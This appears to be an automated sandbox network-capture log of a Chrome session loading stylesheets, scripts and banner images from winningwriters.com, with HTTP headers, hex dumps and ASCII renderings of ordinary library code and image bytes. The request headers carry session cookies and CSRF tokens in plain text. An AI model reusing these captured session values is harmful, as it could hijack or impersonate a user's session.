                                                                                                                                                                                            Data Ascii: /*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */.fancybox-wrap,.fancybox-skin,.fancybox-outer,.fancybox-inner,.fancybox-image,.fancybox-wrap iframe,.fancybox-wrap object,.fancybox-nav,.fancybox-nav span,.fancybox-tmp{pad


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.164970566.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:04 UTC840OUTGET /assets/css/responsive-nav-styles.css HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:04 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:04 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "36f-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 879
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:04 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/css
                                                                                                                                                                                            2024-11-18 20:00:04 UTC879INData Raw: 2f 2a 21 20 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 6a 73 20 31 2e 30 2e 32 33 20 62 79 20 40 76 69 6c 6a 61 6d 69 73 20 2a 2f 0a 0a 2e 6e 61 76 2d 63 6f 6c 6c 61 70 73 65 20 75 6c 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 6e 61 76 2d 63 6f 6c 6c 61 70 73 65 20 6c 69 20 7b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 6a 73 20 2e 6e 61 76 2d 63 6f 6c 6c 61 70 73 65 20 7b 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 20 30 20 30 20 30 29 3b 0a 20 20 6d 61 78 2d 68 65 69
                                                                                                                                                                                            Data Ascii: /*! responsive-nav.js 1.0.23 by @viljamis */.nav-collapse ul { margin: 0; padding: 0; width: 100%; display: block; list-style: none;}.nav-collapse li { width: 100%; display: block;}.js .nav-collapse { clip: rect(0 0 0 0); max-hei


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.164970466.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:04 UTC825OUTGET /assets/js/responsive-nav-scripts.js HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:04 UTC367INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:04 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "3572-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 13682
                                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:04 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                            Content-Type: text/javascript
                                                                                                                                                                                            2024-11-18 20:00:04 UTC7825INData Raw: 2f 2a 21 20 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 6a 73 20 31 2e 30 2e 32 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 76 69 6c 6a 61 6d 69 73 2f 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 6a 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 20 40 76 69 6c 6a 61 6d 69 73 0a 20 2a 20 41 76 61 69 6c 61 62 6c 65 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 2f 2a 20 65 78 70 6f 72 74 65 64 20 72 65 73 70 6f 6e 73 69 76 65 4e 61 76 20 2a 2f 0a 20 20 76 61 72 20 72 65 73
                                                                                                                                                                                            Data Ascii: /*! responsive-nav.js 1.0.23 * https://github.com/viljamis/responsive-nav.js * http://responsive-nav.com * * Copyright (c) 2013 @viljamis * Available under the MIT license */(function () { "use strict"; /* exported responsiveNav */ var res
                                                                                                                                                                                            2024-11-18 20:00:04 UTC5857INData Raw: 6f 6e 65 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 73 65 74 41 74 74 72 69 62 75 74 65 73 28 6e 61 76 54 6f 67 67 6c 65 2c 20 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 20 22 66 61 6c 73 65 22 7d 29 3b 0a 20 20 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 49 66 20 74 68 65 20 6e 61 76 69 67 61 74 69 6f 6e 20 69 73 20 68 69 64 64 65 6e 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6e 61 76 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 2f 28 5e 7c 5c 73 29 63 6c 6f 73 65 64 28 5c 73 7c 24 29 2f 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 41 74 74 72 69 62 75 74 65 73 28 6e 61 76 2c 20 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 20 22 74 72 75 65 22 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 2e 73 74 79 6c 65 2e 70 6f 73
                                                                                                                                                                                            Data Ascii: one") { setAttributes(navToggle, {"aria-hidden": "false"}); // If the navigation is hidden if (nav.className.match(/(^|\s)closed(\s|$)/)) { setAttributes(nav, {"aria-hidden": "true"}); nav.style.pos


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            5192.168.2.164970666.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:04 UTC900OUTGET /graphics/wergle/wergle_2024_top_banner_970_250.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:04 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:04 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 29 Oct 2023 19:34:34 GMT
                                                                                                                                                                                            ETag: "24624-608e002e902ff"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 149028
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:04 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:04 UTC7835INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 01 04 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 06 00 12 01 03 00 01 00 00 00 01 00 00 00 1a 01 05 00 01 00 00 00 b0 00 00 00 1b 01 05 00 01 00 00 00 b8 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 69 87 04 00 01 00 00 00 56 00 00 00 00 00 00 00 07 00 00 90 07 00 04 00 00 00 30 32 33 31 01 91 07 00 04 00 00 00 01 02 03 00 00 a0 07 00 04 00 00 00 30 31 30 30 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 03 00 01 00 00 00 ca 03 00 00 03 a0 03 00 01 00 00 00 fa 00 00 00 86 92 07 00 3b 00 00 00 c0 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 00 41 53 43 49 49 00 00 00 78 72 3a 64 3a 44 41 46 79 71 46 59 65 74 73 73 3a 37 2c 6a 3a 34 30 31 39
                                                                                                                                                                                            Data Ascii: JFIFExifII*(iV02310100;``ASCIIxr:d:DAFyqFYetss:7,j:4019
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 5d d6 d1 06 32 48 23 29 bc 80 11 8f dd e4 0e 05 73 9e 26 f8 a3 f1 2b c4 ff 00 11 bc 29 a7 78 3f e1 c5 f7 fc 23 ba b6 99 a9 dc 78 9e f3 54 d1 26 8a e7 45 99 2d f3 04 41 8b 05 2f 2b b1 8c 80 1b 85 24 1c 1a f2 3f 80 fa 77 c4 8f 06 ff 00 c1 3b f4 4f d9 ab 56 f8 37 e2 7f f8 49 a4 f8 6f ac 69 ba 8c 72 69 85 22 b1 9c da dc f9 68 ee 4e 19 a4 77 8d 11 57 39 2f 93 80 33 5b 2c 75 45 51 c7 75 67 d1 ef a5 90 dc 9d cf 7b f8 57 f1 d3 e1 77 c6 2b 6b 6d 57 e1 dd c5 ec f6 b7 fa 3c 3a b5 9c f7 7e 1e b9 b3 8e ea ce 52 04 73 c4 d3 c4 82 45 3c 7d dc 9c 10 4f 5a a6 7f 68 ff 00 84 12 f8 e3 54 f0 2d 95 de a5 2e a9 a1 6a f6 fa 5e ae 22 f0 ad db c3 6b 73 70 aa d0 c7 24 e2 23 1a 86 0e a4 36 ed bf 30 c9 19 ae 27 f6 11 f0 df 8b 7c 03 f0 87 c1 9f 0f fc 5f 63 e3 08 f5 0d 37 e1 b6 91 65
                                                                                                                                                                                            Data Ascii: ]2H#)s&+)x?#xT&E-A/+$?w;OV7Ioiri"hNwW9/3[,uEQug{Ww+kmW<:~RsE<}OZhT-.j^"ksp$#60'|_c7e
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: bd b4 9d 58 39 8e e1 83 c8 1e 3c 04 75 db c3 03 92 19 a4 dd 58 d3 70 d6 4a eb 5f 5b 2f c0 14 ee f6 dc fa 30 2b ad c9 21 4e 0a 7c dc 74 c1 a4 5c 8b 96 e4 f2 80 93 9e 3a e2 be 6b fd 8c b4 6f 1a 78 97 53 d4 3c 21 f1 4b 5e 3a bd cf c0 ed 7e ef c2 7a 46 a6 b7 93 23 ea bf 22 49 1d ed d2 ee c3 ca 2d de 28 f0 db 86 f1 23 f5 23 1d 06 91 ad 6b 9f 10 ff 00 6d ef 18 fc 33 f8 8f 29 8f 47 f0 df 84 34 ab cf 07 e8 ce ee 90 df 7d a1 a6 17 77 84 02 3c f6 57 44 8b 07 22 31 ce 01 6c d6 f0 c7 b9 d2 8c f9 6d cc ec b5 fc c6 a7 74 9f 73 dc a1 4d b7 33 07 e3 e6 1f fd 7a 7d b2 48 ec c3 61 25 9c 9e 95 f3 9d ed fc 1a 07 ed 73 e0 3f d9 c2 db 5a 99 bc 01 7d e1 2d 7b 51 b4 8e 6d 45 e4 4b dd 6e 1b a4 1f 61 69 4b ee 75 82 17 91 96 12 c7 b6 41 da 00 e4 f5 ef 05 eb 1a ff 00 8a 3e 37 7e cd
                                                                                                                                                                                            Data Ascii: X9<uXpJ_[/0+!N|t\:koxS<!K^:~zF#"I-(##km3)G4}w<WD"1lmtsM3z}Ha%s?Z}-{QmEKnaiKuA>7~
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 24 9d 90 00 7d b9 7d 3f e3 7f 8a fc 15 f0 a7 f6 7a f1 7c 88 97 13 ea 96 ba 1a 6a 76 f2 4d fb e8 63 b7 d6 1f 4f fb 4a 64 e7 f7 96 b7 32 c6 40 18 2a 9c f0 32 39 2b e6 32 8d 48 a5 15 74 ee ff 00 af 43 96 38 f8 b8 a9 3e 9b fc 9d bf a4 7d 7f a1 fc 11 f8 39 e1 5b c8 af b4 6f 85 9a 05 a4 d0 cd 34 d0 5c db e9 91 a9 49 26 05 66 71 81 f2 b3 82 43 1e ac 09 cd 68 78 2b e1 bf 80 3c 00 8f 6f e0 cf 07 e9 da 5e 21 58 31 63 6c b1 e2 15 24 a4 63 1f 75 06 e2 42 8f 94 12 70 39 af 1c fd 96 be 3b 7c 41 f1 ee 9b e0 dd 4b c5 ba 61 b5 ff 00 85 89 7b e2 9f 13 7d 8e 5b 81 31 b2 d2 92 e6 18 74 f8 d5 bf 85 58 15 60 07 04 b9 c0 e7 8f 57 f0 1f 8d d3 c4 d7 be 21 d1 64 9e 0f ed 0f 0c eb f2 e9 da 84 30 82 36 a9 44 9a 07 2a 49 38 78 65 43 e9 9d d8 f4 af 43 0b 5f 07 59 c5 c6 29 37 7b 69 fd
                                                                                                                                                                                            Data Ascii: $}}?z|jvMcOJd2@*29+2HtC8>}9[o4\I&fqChx+<o^!X1cl$cuBp9;|AKa{}[1tX`W!d06D*I8xeCC_Y)7{i
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 59 22 68 a3 4c c9 2d b4 77 71 f9 58 1b 61 88 28 51 bb 07 3e 76 1e 84 29 c6 51 a9 1b 36 f7 fc ed f9 0d e1 e7 ce 92 95 ac ba dd ab ff 00 5d 76 b7 a9 f1 5f c1 df 8d df b4 3e 97 a3 f8 ab c3 b3 fc 14 f8 89 77 e3 6f 17 78 9f fb 77 5f f1 65 97 85 6e 67 b6 82 fa 56 92 28 a6 3b 10 b3 5b d9 c7 3c d2 c6 88 1b cd 99 d7 27 6c 63 3e 81 a2 f8 7f e3 5f ed 79 f1 7a 4d 47 54 d3 af fe 19 7c 05 f8 45 a5 58 e8 77 de 22 f1 0e a0 21 7b 5b 5b 08 ca e2 46 07 2f 77 28 92 56 31 a7 08 f2 ae e3 94 15 fa 7f f1 3b 5a d2 b4 1f 05 ea 1a cf 8c d9 7f b2 6c ad 24 6d 48 4f a9 3c 16 de 46 3e 76 93 19 ca 80 06 06 09 e7 81 5f 89 3f f0 50 3f da 1b e3 57 c7 6f 8f 5a 8f c3 1f 12 78 c2 eb c1 1f 0e b4 7b a7 97 c3 fe 1b 5b 49 17 4d b6 89 63 56 f3 63 8e d2 21 f6 87 7e 5b 7b 0d d8 6f 9b 67 35 ea cf 01
                                                                                                                                                                                            Data Ascii: Y"hL-wqXa(Q>v)Q6]v_>woxw_engV(;[<'lc>_yzMGT|EXw"!{[[F/w(V1;Zl$mHO<F>v_?P?WoZx{[IMcVc!~[{og5
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: af 06 fd 83 fe 35 78 b3 c2 bf 13 3e 3d 59 b7 c4 5b 9f 10 e9 36 5e 34 f0 a6 a3 73 aa 6a e4 45 71 60 2e 26 16 97 71 5d ee da ab 34 31 46 12 67 19 56 31 17 c9 cd 7d c7 f1 9f fe 15 f1 f8 5d ad df 7c 5a f0 f5 96 ad e1 dd 3b 4c b8 bd d4 ac b5 2b 24 b8 8f c8 86 26 91 f0 8e 08 dd b5 48 04 60 fb d7 e3 ef c7 7f da 83 e2 07 ed c5 0e 85 e1 fb bd 6e cf c1 fe 1b f1 84 97 77 ba 86 89 06 9f 6c 6d f4 fd 32 d8 bc b0 dc 4b 05 bb 2c 97 4e b0 a8 c4 93 67 2c cc 06 d1 c5 7c ed 5c 04 a3 8c bc 65 6e be 9f f0 ff 00 91 f3 d9 a5 59 60 25 1a bb bd 76 be 8b cf 7d 97 df f3 3e d7 f8 f9 ff 00 05 93 f8 2f e1 ef 14 5e fc 27 fd 96 2d 27 f8 81 e2 e7 b1 b9 16 5a ae 99 6b 24 da 55 95 d4 6c bb 12 46 52 a6 74 23 79 67 8d b6 a6 d1 92 41 38 c0 f8 3b fb 15 78 fb f6 8d f0 16 a1 f1 ff 00 fe 0a 0d f1
                                                                                                                                                                                            Data Ascii: 5x>=Y[6^4sjEq`.&q]41FgV1}]|Z;L+$&H`nwlm2K,Ng,|\enY`%v}>/^'-'Zk$UlFRt#ygA8;x
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 75 ec 05 2c 00 b2 6f 7e ac 4b 73 d8 53 01 6d b2 10 ae 38 0e 47 d3 fc e6 9b 6e a7 c8 da c7 80 e4 7e 19 a5 b6 c8 8f cc 7e 85 8b 66 99 6f 2b b4 43 ca 4c e5 8e 59 f8 1d 7b 7a d0 03 ed f0 d6 ea b8 ed 8f e9 4d 8d 95 6d 95 5e 45 07 67 73 54 ef db 5f d3 9d 67 b6 b2 8e f2 d0 2e 1e 25 9b ca 9c 3e 79 2a 58 84 61 8f e1 25 4f a1 3d 29 ba 17 89 7c 3b ad f9 91 69 92 7e fe df 1f 69 b4 92 16 49 e0 27 3b 44 91 b0 dc 99 c1 c1 3c 1e c4 d6 4a b4 1c ac 47 b4 8f 37 2f 52 db cd 0b 59 88 da 41 9c 2e 47 d3 14 f9 67 85 a4 8c 09 14 fc e4 9c 1f 6a 73 5c 9c 64 42 e0 63 b8 03 fa d7 cd 9f 1e 3f 6b df 89 1e 2d f8 87 ab fe cd 1f b2 0f c3 eb ad 7b c4 16 10 cf 6b e2 df 17 31 68 6d bc 35 31 4c 46 21 63 1b ad c5 c0 62 0e 30 50 6d 2a 4e 4e 42 ab 59 52 5b 5d f6 31 c5 62 a8 e1 61 cd 51 ef a2 5d
                                                                                                                                                                                            Data Ascii: u,o~KsSm8Gn~~fo+CLY{zMm^EgsT_g.%>y*Xa%O=)|;i~iI';D<JG7/RYA.Ggjs\dBc?k-{k1hm51LF!cb0Pm*NNBYR[]1baQ]
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 59 13 ba e3 47 76 ce 07 73 11 ec 7f d9 e8 6b f4 93 23 a7 be b1 b3 d4 ad 5e c6 fe d9 25 86 45 c3 c6 eb 90 45 72 7b 35 5f 85 f3 ef 59 25 bb f0 fb 1f 99 4f cd 25 8f b8 f5 4f e5 5d 17 87 bc 47 a6 78 9a c0 5f e9 b2 92 01 db 2c 4e 30 f1 b7 75 61 d8 8a bb 2c 51 cd 1b 45 2a 06 56 18 65 61 90 45 00 36 d6 ea de f6 dd 2e ed 26 59 22 91 43 23 a1 c8 60 7b d5 5f 10 f8 7f 4d f1 2e 98 fa 66 a5 0e e5 6e 51 87 0c 8c 3a 30 3d 88 ae 71 fc ff 00 86 1a a0 74 25 bc 3f 75 26 1d 7a fd 8a 46 3d 47 fb 04 fe 55 d8 23 a4 8a 1e 36 05 48 c8 20 f5 a0 0e 73 c1 fa ee a5 6b 7d 27 83 3c 53 2e eb eb 75 dd 6f 70 46 05 dc 5d 9c 7b 8e f5 bb a9 69 d6 7a b5 8c ba 6d fc 02 48 66 42 b2 23 77 15 99 e3 4f 0c be bd 62 97 7a 74 82 1d 46 c9 fc db 1b 8c 7d d6 1f c2 7f d9 3d 0d 4d e1 0f 12 47 e2 6d 1d 6f
                                                                                                                                                                                            Data Ascii: YGvsk#^%EEr{5_Y%O%O]Gx_,N0ua,QE*VeaE6.&Y"C#`{_M.fnQ:0=qt%?u&zF=GU#6H sk}'<S.uopF]{izmHfB#wObztF}=MGmo
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 13 41 f8 97 e0 70 33 fd bc 9f f7 e6 4f fe 26 bc df fb 20 36 33 9c 8f 6a 46 d1 d7 39 c7 e9 4b fe 22 ee 77 ff 00 3e 69 fd d2 ff 00 e4 8a ff 00 88 09 c3 f6 fe 3d 6f be 1f fc 81 e9 3f f0 b2 bc 11 9c 7f 6e a7 fd f9 7f fe 26 94 7c 48 f0 49 ff 00 98 f2 7f df a7 ff 00 e2 6b cd 46 8e bc 0c f7 f4 ae 8f 47 f8 2d e3 3d 6b c3 17 3e 30 b6 d3 0a 58 db 4c 91 99 a7 75 8d 5d 98 37 0a 58 8c 9f 97 a0 f5 a6 bc 5b cf 1b d2 8d 3f ba 7f fc 91 86 27 c0 fe 15 c1 c1 4a be 2a ac 53 69 2b ca 9a bb 7a 25 f0 1b 7a c7 8a be 17 6b d0 1b 5d 5e f6 da 75 c7 f1 db b9 23 e8 76 e4 57 19 3f c4 ff 00 06 78 0f 56 3a 6f 86 7e 23 c4 e3 a8 d1 b5 85 96 3d e3 d2 19 1d 40 27 d8 66 ac bf c3 6d 75 17 77 d8 94 e7 9c 2b 8a cc d5 bc 10 af 01 b4 d7 34 65 92 22 7e 68 ee 20 0c 84 fe 20 8a a5 e2 de 76 be 2a 14
                                                                                                                                                                                            Data Ascii: Ap3O& 63jF9K"w>i=o?n&|HIkFG-=k>0XLu]7X[?'J*Si+z%zk]^u#vW?xV:o~#=@'fmuw+4e"~h v*
                                                                                                                                                                                            2024-11-18 20:00:04 UTC8000INData Raw: 1e 31 c6 7a 74 b6 5f b2 bf c1 7b 42 24 9b c3 d7 57 4e ad b8 3d d6 a9 3b 1c fd 37 81 f8 62 bc 8e 17 a9 f5 bc 83 0d 5a 2b 95 38 a7 63 fd 2e e1 be 2e cb 7f d5 9c 2c f1 57 95 59 41 39 72 ab d9 dd f7 68 f8 97 53 f0 eb f8 17 e1 5d 85 c7 96 df 62 d6 3c 38 da b6 8d 77 13 79 72 5a 6a 91 c0 2e 1e 31 80 08 25 c1 95 0f 5e 24 53 c0 19 d7 f8 c1 a6 4b ad fc 45 d2 1f 51 98 31 d3 2f ac 2f 65 2a 30 b2 5c cd 14 81 4a fb 05 8e 76 fc ab d4 3c 59 e0 5d 03 40 5d 47 e0 b7 8b 34 98 ae 34 8d 23 5a 64 5b 3b 85 c8 6d 3a e1 99 ed 65 56 3f 30 29 b9 a2 dc 08 21 a1 6e 6b c9 35 9d 23 58 f0 8e a9 65 e1 bd 75 a4 ba 9b 4b b8 d3 2d 92 72 fb ff 00 70 25 b9 82 12 5b bb 08 9c 64 fa 9a fd 3e 14 e9 3e 69 c3 ed 6b f3 71 7a ff 00 5d 4f f1 13 c5 8f 10 33 de 22 cc 70 fc 31 9f 47 fe 14 b2 29 e3 70 ca
                                                                                                                                                                                            Data Ascii: 1zt_{B$WN=;7bZ+8c..,WYA9rhS]b<8wyrZj.1%^$SKEQ1//e*0\Jv<Y]@]G44#Zd[;m:eV?0)!nk5#XeuK-rp%[d>>ikqz]O3"p1G)p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            6192.168.2.164971066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:04 UTC898OUTGET /graphics/tomstory/tom_story_wide_banner_2025.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:04 UTC372INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:04 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 27 Oct 2024 20:56:33 GMT
                                                                                                                                                                                            ETag: "1b1f0-6257b965649c6"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 111088
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:04 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
